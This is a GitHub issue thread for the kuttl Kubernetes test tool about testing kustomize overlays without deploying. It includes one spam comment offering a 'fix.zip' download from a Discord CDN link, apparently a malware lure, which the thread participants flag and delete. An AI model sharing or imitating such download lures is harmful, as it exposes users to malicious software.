### ISSUE TITLE
[Question]: Test without actually deploying anything?

### ISSUE THREAD

**Issue by siredmar** [kudobuilder/kuttl#559]
Hi!

I'm searching for a test tool that supports me testing my kustomize overlays in terms of: 
"What you define in your overlay matches the expected outcome."

What i basically need is:
1. It can run commands like `kustomize build ${myoverlay} > foo.yaml`
2. It compares the manifests from `foo.yaml` with some asserted resources. The minimum i need is kind, apiVersion, metadata.name and metadata.namespace. 

For this i don't need or even want deploy this anywhere.

Is this kind of setup possible with kuttl?

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by siredmar** [comment]
@porridge i think the user @zawa999 is a bot and the link is malicious. Please consider deleting this comment.

**Comment by porridge** [comment]
Thanks @siredmar , reported and deleted.

**Comment by porridge** [comment]
@siredmar this is not possible, but it looks like what you need is a subset of https://github.com/kudobuilder/kuttl/issues/552
Let me close this one as a duplicate and we can continue there.

In the meantime, you would probably be able to achieve something close with not much overhead if you used the mocked [control plane feature](https://github.com/kudobuilder/kuttl/blob/main/docs/testing/test-environments.md#mocked-control-plane).

**Comment by porridge** [comment]
@siredmar this is not possible, but it looks like what you need is a subset of https://github.com/kudobuilder/kuttl/issues/552
Let me close this one as a duplicate and we can continue there.

In the meantime, you would probably be able to achieve something close with not much overhead if you used the mocked [control plane feature](https://github.com/kudobuilder/kuttl/blob/main/docs/testing/test-environments.md#mocked-control-plane).
